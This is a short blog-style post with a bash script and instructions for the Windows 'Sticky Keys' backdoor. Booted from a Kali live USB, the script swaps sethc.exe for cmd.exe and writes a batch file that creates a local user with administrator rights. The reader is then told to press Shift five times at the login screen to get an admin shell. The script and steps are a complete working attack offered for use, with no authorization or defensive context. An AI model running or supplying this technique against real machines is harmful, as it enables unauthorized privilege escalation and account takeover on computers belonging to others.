A quick little script for using the sethc.exe patch under Windows OS.
------------sethcpatch.sh v3 start--------------
#! /bin/bash
# cmd.exe --> sethc.exe copy patch
# Target Windows XP - 10, Windows Server 2k, 2k3, 2k8, Not testet on Server 2016
# Version 0.3 - January 2020
# By nx <This email address is being protected from spambots. You need JavaScript enabled to view it.>
HELP()
{
echo "Run with patchwin / unpatchwin"
}
PATCH_WIN ()
{ echo "patching windows sethc function...."
sleep 2
mkdir patch
cp sethc.exe patch/sethc.bak
cp cmd.exe patch/cmd.bak
rm sethc.exe
cp cmd.exe sethc.exe
echo "patching done ......"
sleep 2
echo "Writing windows bat file..."
cd patch
touch useradd.bat
echo "net user /add user password" > useradd.bat
echo "net localgroup administrators user /add" >> useradd.bat
cd ..
sleep 2
echo "useradd.bat written to c:\windows\system32\patch\useradd.bat"
echo "Run with useradd.bat"
sleep 2
}
UNPATCH_WIN()
{
echo "unpatch Windows sethc.exe"
sleep 2
rm sethc.exe
rm cmd.exe
cd patch
cp sethc.bak ../sethc.exe
cp cmd.bak ../cmd.exe
cd ..
rm -rf patch
sleep 2
echo "Done cleaning up !"
echo "sethc.exe & cmd.exe reset to original..."
echo "Script terminating... "
}
case $1 in
help) HELP
;;
patchwin) PATCH_WIN
;;
unpatchwin) UNPATCH_WIN
;;
esac
exit 0
-----------------sethcpatch.sh v3 end------------------So, add it to a live distro image, under /root/live-build-config/variant-X/includes.chroot/
Make a folder, eg /opt/tools/local/win, and throw the script there, and remember to chmod +x.
And what to do next ?. Boot a Windows machine from live USB, run the script, to patch the Windows machine. Remember to change the script to your own user and password, before including it in a live-distro.
When the patch is run, shutdown the live Kali, boot into Windows, press shift five times at the login promt, run useradd.bat, and enjoy your new admin privs :)
NOTE : This won't work if BIOS / UEFI access is password protected, OR the disk itself is encrypted. You will need read / write access to the Windows partition from Kali Linux. It's not a wondercure, or a crack in any way. It's just a simple helperscript for doing something you could do by hand. Gaining access by exploits, remote or local, is for another article :)